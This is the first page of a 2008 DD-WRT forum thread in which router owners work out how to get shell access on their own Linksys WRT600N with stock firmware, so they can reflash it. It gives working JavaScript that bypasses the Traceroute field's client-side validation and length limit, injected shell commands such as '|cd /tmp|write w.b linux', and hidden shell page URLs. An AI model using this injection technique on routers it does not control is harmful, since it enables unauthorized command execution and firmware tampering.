WRT600N tracert exploit with stock Linksys firmware

Post new topic   Reply to topic    DD-WRT Forum Forum Index -> Broadcom SoC based Hardware
Goto page 1, 2, 3 ... 19, 20, 21  Next
Author Message
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Sat Apr 19, 2008 5:35    Post subject: WRT600N tracert exploit with stock Linksys firmware Reply with quote
A lot of folks are stuck with the stock Linksys firmware on their unflashable WRT600N (1.01.35 build 5). My goal is to help them gain shell access.

I am running 1.01.35 build 3 on my WRT600N (which is flashable), but I think they are similar enough that my tests are valid.

After some poking around, I've found that Tracert on the Diagnostics page only does client-side validation. What this means is we have an opportunity to bypass the validation and execute commands on the router.

Be warned that downgrading may cause you to lose the functionality of your wired ethernet ports. In that case, you'll only be able to access your router via wireless. A newer build (1.01.36 build 3) is available at the bottom of page 7.


Last edited by Transient on Tue Apr 29, 2008 4:45; edited 3 times in total
Sponsor
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Sat Apr 19, 2008 5:36    Post subject: Reply with quote
To disable this validation, we can use the following code:

Code:
javascript:function ValidateForm1(passForm){res=1;if (document.forms[0].Traceroute.value == "") {res=0;alert(translate_str("Diagnostics",9));document.forms[0].Traceroute.focus();return false;}if (res == 1){document.forms[0].Traceroute.value = '192.168.1.1;'+document.forms[0].Traceroute.value+' ';passForm.tracertstr.value = document.forms[0].Traceroute.value;setTimeout("self.open('Tracert.htm','Tracert','resizable=0,scrollbars=yes,width=800,height=480').focus();",1000);passForm.submit();}};ValidateForm1(document.forms[1]);


This assumes your router's IP address is 192.168.1.1 but after running this code you can enter any value in the traceroute test textbox and have it execute on your router!


Last edited by Transient on Sat Apr 19, 2008 6:11; edited 1 time in total
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Sat Apr 19, 2008 5:37    Post subject: Reply with quote
For example, put in the textbox:

Code:
ls -l /


Then paste the above javascript call into the Address bar of Internet Explorer 7 (perhaps other browsers will work as well) and press Enter.

A new window called Tracert should open (make sure your popup blocker is off) and instead of a tracert you'll actually see the output of your ls command!

For more convenience, I add the javascript code to a button on my Links bar. Then I can simply press this button instead of having to paste it in the Address bar each time.

Be warned though, that putting in a command that fails seems to hang the httpd process. Rebooting the router seems to fix this, but I accept no responsibility if you damage your router! Try at your own risk!

That said, let's see if we can find a way to install telnetd!
jmh9072
DD-WRT Guru


Joined: 04 Sep 2007
Posts: 800
Location: Ohio

PostPosted: Sat Apr 19, 2008 6:12    Post subject: Reply with quote
Transient wrote:
That said, let's see if we can find a way to install telnetd!

Well, you could do that, or you could just do a simple wget and then an mtd command. That might be easier.

Good job finding this.

_________________
WRT54G v3 - v24 r14471M NEWD Eko - AP
WRT350N v1.0
WRT600N v1.1 - halfway there!
Se7en is Darker...
CryptoNews
DD-WRT Novice


Joined: 07 Jun 2006
Posts: 38

PostPosted: Sat Apr 19, 2008 7:44    Post subject: it works Reply with quote
Hi,

The trick works, find attached the list of files in wrt600n

waiting next steps

WRT600n v11
Running the nasty build 5

Thanks for your help



wrt600n.JPG
 Description:
ScreenShot
 Filesize:  56.53 KB
 Viewed:  42661 Time(s)

wrt600n.JPG


Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Sat Apr 19, 2008 8:22    Post subject: Re: it works Reply with quote
jmh9072 wrote:
or you could just do a simple wget and then an mtd command. That might be easier.


CryptoNews wrote:
The trick works, find attached the list of files in wrt600n


Great! I think the next step is to try jmh9072's advice.

I had a look and we do have wget, however the mtd command is missing. I do see the following in /dev/mtd:

Code:
0
0ro
1
1ro
2
2ro
3
3ro
4
4ro


I'm not sure, but I think maybe we can wget the firmware into /tmp and then cat it to the correct mtd folder.

Hopefully somebody with experience can chime in with some advice?
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Sat Apr 19, 2008 8:33    Post subject: Reply with quote
btw, I seem to have found three secret pages on the website:

http://192.168.1.1/Hidden.htm (press CTRL-A to see hidden links)
http://192.168.1.1/Shell.htm
http://192.168.1.1/dl_shell.htm

I'm not sure what these pages are for, or if they'll help, but I thought I'd point them out.
mpho01
DD-WRT Novice


Joined: 10 Jun 2006
Posts: 23

PostPosted: Sat Apr 19, 2008 14:03    Post subject: Reply with quote
This is great news!
As soon as my WRT600N comes in I'll do some testing.

Thanks
xanderx
DD-WRT Novice


Joined: 19 Apr 2008
Posts: 28

PostPosted: Sat Apr 19, 2008 14:24    Post subject: Reply with quote
jmh9072 wrote:
Transient wrote:
That said, let's see if we can find a way to install telnetd!

Well, you could do that, or you could just do a simple wget and then an mtd command. That might be easier.

Good job finding this.


the trik work fine :)

i have the bad build 5 firmware :(

i have used the command mount and i see that i can see the usb disk ... i have copied the firmware build 3 under the root of the usb disk...

/dev/root on / type squashfs (ro)
none on /dev type devfs (rw)
proc on /proc type proc (rw)
ramfs on /tmp type ramfs (rw)
none on /proc/bus/usb type usbfs (rw)
/dev/scsi/host0/bus0/target0/lun0/part1 on /tmp/memstick/host0_part1 type ufsd (rw)
/dev/scsi/host0/bus0/target0/lun0/part1 on /tmp/ftproot/root type ufsd (rw)

But now how can i upgrade the firmware to versione 3 ?

Regards

Alessandro
jmh9072
DD-WRT Guru


Joined: 04 Sep 2007
Posts: 800
Location: Ohio

PostPosted: Sat Apr 19, 2008 16:10    Post subject: Reply with quote
So maybe the reason they won't flash is that it doesn't have mtd. I guess you could wget mtd from a somewhere and then chmod +x on it. Then it might work. I'll upload mtd to my server when I get a chance.

EDIT: Does it have the 'write' command? If so you could do it using that.

_________________
WRT54G v3 - v24 r14471M NEWD Eko - AP
WRT350N v1.0
WRT600N v1.1 - halfway there!
Se7en is Darker...
xanderx
DD-WRT Novice


Joined: 19 Apr 2008
Posts: 28

PostPosted: Sat Apr 19, 2008 16:17    Post subject: Reply with quote
jmh9072 wrote:
So maybe the reason they won't flash is that it doesn't have mtd. I guess you could wget mtd from a somewhere and then chmod +x on it. Then it might work. I'll upload mtd to my server when I get a chance.

EDIT: Does it have the 'write' command? If so you could do it using that.


sorry i m not expert with linux, but if i have mouted my usb disk, wy i need to use wget ? why i can not copy the file(s) that i need from the usb disk ?

can you send to my email the program that you have talked (mtd)?

Thanks
jmh9072
DD-WRT Guru


Joined: 04 Sep 2007
Posts: 800
Location: Ohio

PostPosted: Sat Apr 19, 2008 17:17    Post subject: Reply with quote
xanderx wrote:
jmh9072 wrote:
So maybe the reason they won't flash is that it doesn't have mtd. I guess you could wget mtd from a somewhere and then chmod +x on it. Then it might work. I'll upload mtd to my server when I get a chance.

EDIT: Does it have the 'write' command? If so you could do it using that.


sorry i m not expert with linux, but if i have mouted my usb disk, wy i need to use wget ? why i can not copy the file(s) that i need from the usb disk ?

can you send to my email the program that you have talked (mtd)?

Thanks

I was speaking in general. You should be able to get it off the usb disk. Try this (make sure to replace [FIRMARE_FILENAME] with the name of the .bin you want to use):
Quote:
write /tmp/memstick/host0_part1/[FIRMWARE_FILENAME] linux

_________________
WRT54G v3 - v24 r14471M NEWD Eko - AP
WRT350N v1.0
WRT600N v1.1 - halfway there!
Se7en is Darker...
xanderx
DD-WRT Novice


Joined: 19 Apr 2008
Posts: 28

PostPosted: Sat Apr 19, 2008 18:37    Post subject: Reply with quote
jmh9072 wrote:
xanderx wrote:
jmh9072 wrote:
So maybe the reason they won't flash is that it doesn't have mtd. I guess you could wget mtd from a somewhere and then chmod +x on it. Then it might work. I'll upload mtd to my server when I get a chance.

EDIT: Does it have the 'write' command? If so you could do it using that.


sorry i m not expert with linux, but if i have mouted my usb disk, wy i need to use wget ? why i can not copy the file(s) that i need from the usb disk ?

can you send to my email the program that you have talked (mtd)?

Thanks

I was speaking in general. You should be able to get it off the usb disk. Try this (make sure to replace [FIRMARE_FILENAME] with the name of the .bin you want to use):
Quote:
write /tmp/memstick/host0_part1/[FIRMWARE_FILENAME] linux


i can not solve :(

i have only 30 char for put the command and i can not write the full command

"|cd /tmp/ftproot/root|write w.b linux"

I can only write "|cd /tmp/ftproot/root|write w."

how can i solve ?

thanks
jmh9072
DD-WRT Guru


Joined: 04 Sep 2007
Posts: 800
Location: Ohio

PostPosted: Sat Apr 19, 2008 18:41    Post subject: Reply with quote
xanderx wrote:
jmh9072 wrote:
xanderx wrote:
jmh9072 wrote:
So maybe the reason they won't flash is that it doesn't have mtd. I guess you could wget mtd from a somewhere and then chmod +x on it. Then it might work. I'll upload mtd to my server when I get a chance.

EDIT: Does it have the 'write' command? If so you could do it using that.


sorry i m not expert with linux, but if i have mouted my usb disk, wy i need to use wget ? why i can not copy the file(s) that i need from the usb disk ?

can you send to my email the program that you have talked (mtd)?

Thanks

I was speaking in general. You should be able to get it off the usb disk. Try this (make sure to replace [FIRMARE_FILENAME] with the name of the .bin you want to use):
Quote:
write /tmp/memstick/host0_part1/[FIRMWARE_FILENAME] linux


i can not solve :(

i have only 30 char for put the command and i can not write the full command

"|cd /tmp/ftproot/root|write w.b linux"

I can only write "|cd /tmp/ftproot/root|write w."

how can i solve ?

thanks

Type
"|cp /tmp/ftproot/root/w.b /tmp"
then
"|cd /tmp|write w.b linux"
That should work.

_________________
WRT54G v3 - v24 r14471M NEWD Eko - AP
WRT350N v1.0
WRT600N v1.1 - halfway there!
Se7en is Darker...
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Sat Apr 19, 2008 18:46    Post subject: Reply with quote
Okay, currently the textbox is limited to 30 characters. We can expand it using this code:

Code:
javascript:document.getElementById('Traceroute').maxLength=1000;void(0);


It works the same way as the code above -- either put it in the address bar and press Enter or add it to a button on your Links bar.

Run that code and your box will now allow 1000 characters.
Goto page 1, 2, 3 ... 19, 20, 21  Next Display posts from previous:    Page 1 of 21
Post new topic   Reply to topic    DD-WRT Forum Forum Index -> Broadcom SoC based Hardware All times are GMT

Navigation

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum